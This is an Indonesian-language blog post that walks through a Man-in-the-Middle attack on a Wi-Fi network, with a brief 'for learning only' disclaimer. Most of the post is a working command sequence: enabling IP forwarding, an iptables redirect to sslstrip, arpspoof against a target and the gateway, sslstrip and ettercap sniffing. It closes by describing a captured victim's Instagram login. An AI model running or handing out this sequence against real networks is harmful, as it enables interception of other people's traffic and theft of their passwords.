Sting Category

 

Postingan berikut dibuat hanya sebagai pembelajaran saja ya bro, jadi jangan di salah gunakan, gunakan ilmu dengan bijak :D
Teknik ini biasa di sebut Man In The Middle Attack (MITM)
Apa itu MITM ?
Serangan Man in The Middle (MiTM) adalah salah satu serangan hacking yang dilakukan dari dalam jaringan untuk melakukan penyadapan informasi dengan cara membelokkan jalur koneksi dimana penyerang berada di antara dua target yang sedang melakukan komunikasi
Biar gak penasaran langsung saja bro kita praktekkan
Pertama kita buka terlebih dahulu konfigurasi ettercap yang berada di folder /etc/ettercap/ kita buka menggunkan leafpad
leafpad /etc/ettercap/etter.conf
selanjutnya cari kata # if you use iptables: kemudian hilangkan tanda pagar di depan redir_command_on dan
redir_command_off
redir_command_on dan redir_command_off
menjadi
redir_command_on dan redir_command_off

selanjutnya kita aktifkan IP Forward dengan perintah
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward

kemudian redirect port 80 ke 10000, agar koneksi pada port default akses web (80) kita redirect ke port SSLSTRIP yang kita gunakan untuk menterjemahkan akses HTTPS ke HTTP, dengan perintah
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

sebelum ke tahap selanjutnya kita harus mengatahui ip gateway dan ip target terlebih dahulu,
untuk mengetahui ip gateway cukup ketikkan di terminal
route -n
route -n

selanjutnya untuk mengetahui ip target disini saya menggunakan angry ip scanner, kalian juga bisa menggunakan autoscan-network, nmap dan sebagainya

disini saya sudah mendapatkan target yg sedang aktif di jaringan wifi

IPScan

Selanjutnya lakukan spoof arp menggunakan arpspoof
arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1
arpspoof -i wlan0 -t 192.168.1.105 192.168.1.1

keterangan:
wlan0               : jenis interface yang digunakan 
192.168.1.105 : Ip target
192.168.1.1     : ip gateway

Sejanjutnya buka terminal baru untuk menjalankan sslstrip, perintahnya
sslstrip -akf
sslstrip -akf

Buka terminal baru lagi untuk melakukan sniffing dengan menggunakan ettercap
ettercap -T -q -i wlan0 -M arp // //
ettercap -T -q -i wlan0 -M arp // //

Jadi nanti jika target mengakses situs-situs yang memerlukan login, nanti hasilnya seperti dibawah ini

ARP Poisoning

Terlihat username dan pasword korban sedang login di instagram

Posting Komentar

 
Top